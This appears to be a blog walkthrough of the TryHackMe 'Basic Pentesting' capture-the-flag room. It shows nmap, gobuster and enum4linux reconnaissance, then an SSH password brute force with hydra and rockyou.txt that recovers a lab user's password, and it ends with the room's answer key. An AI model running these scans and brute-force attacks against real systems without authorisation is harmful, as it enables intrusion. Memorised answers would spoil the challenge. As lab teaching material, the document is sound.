Hello Friend

Intro

In this challange you will learn how the pentesting is performed on a web application.Also you gonna learn the processes involve information gathering, vulnerability scanning, exploitation, and post-exploitation analysis by using bunch of hacking tools like hydra, gobuster, nmap and many more.

Room Link: https://tryhackme.com/room/basicpentestingjt

⚠️Tools used:
> Ping
> Nmap
> Gobuster
> Enum4linux
> Hydra
page source

ping scan

Do the ping scan to check the host is reachable or not across the ip address./ command:ping 10.10.164.240

┌──(sumit㉿mr-nob0dy)-[~/ctf/tryhackme/basic-pentesting]
└─$ ping 10.10.164.240
PING 10.10.164.240 (10.10.164.240) 56(84) bytes of data.
64 bytes from 10.10.164.240: icmp_seq=1 ttl=63 time=192 ms
64 bytes from 10.10.164.240: icmp_seq=2 ttl=63 time=187 ms
64 bytes from 10.10.164.240: icmp_seq=3 ttl=63 time=396 ms
64 bytes from 10.10.164.240: icmp_seq=4 ttl=63 time=271 ms
64 bytes from 10.10.164.240: icmp_seq=5 ttl=63 time=191 ms
64 bytes from 10.10.164.240: icmp_seq=6 ttl=63 time=190 ms
^C
--- 10.10.164.240 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5002ms
rtt min/avg/max/mdev = 187.244/237.909/396.222/76.726 ms

nmap

Now do the nmap scan to check which ports are open. To run the nmap scan first create the nmap directory then run the following command by this you can store the result of nmap scan into a file./ command:mkdir nmap
command:cd nmap
command:nmap -sV -oN nmap/basic-pentesting 10.10.164.240

Command breakdown:

  • -sv : version detection.
  • -oN : store the output into the given folder.
┌──(sumit㉿mr-nob0dy)-[~/ctf/tryhackme/basic-pentesting]
└─$ nmap -sV -oN nmap/basic-pentesting 10.10.164.240
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 23:17 IST
Nmap scan report for 10.10.164.240
Host is up (0.19s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.82 seconds

Following ports are open. open ports

22
80
139
445

Finding hidden directories

To find hidden directories on the server we use the gobuster tool just run the following command. Also provide the wordlist, here we use the default list of directories which is already given in the linux.
command:gobuster dir -u http://10.10.164.240/ -w /home//sumit/ctf/directory-list-2.3-medium.txt

┌──(sumit㉿mr-nob0dy)-[~/ctf/tryhackme/basic-pentesting]
└─$ gobuster dir -u http://10.10.164.240/ -w /home//sumit/ctf/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.164.240/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home//sumit/ctf/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 320] [--> http://10.10.164.240/development/]
Progress: 1035 / 220561 (0.47%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1036 / 220561 (0.47%)
===============================================================
Finished
===============================================================
page source page source page source

enum4linux

command:enum4linux -a 10.10.164.240


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''

hydra

command:hydra -l jan -P /home/sumit/ctf/rockyou.txt ssh://10.10.164.240


[STATUS] 92.00 tries/min, 276 tries in 00:03h, 14344125 to do in 2598:35h, 13 active
[STATUS] 91.71 tries/min, 642 tries in 00:07h, 14343759 to do in 2606:37h, 13 active
[22][ssh] host: 10.10.164.240   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-08 23:05:10

Question and Answer

  1. Deploy the machine and connect to our network
    Ans: No answer needed

  2. Find the services exposed by the machine
    Ans: No answer needed

  3. What is the name of the hidden directory on the web server(enter name without /)?
    Ans: development

  4. User brute-forcing to find the username & password
    Ans: No answer needed

  5. What is the username?
    Ans: jan

  6. What is password?
    Ans: armando

  7. What service do you use to access the server(answer in abbreviation in all caps)?
    Ans: SSH

  8. Enumerate the machine to find any vectors for privilege escalation
    Ans: no answer needed

  9. What is the name of the other user you found(all lower case)?
    Ans: kay

  10. If you have found another user, what can you do with this information?
    Ans: No answer needed

  11. What is the final password you obtain?
    Ans:

Congrats, we have successfully completed the room, hope you learnt something new…

Thanks for the reading…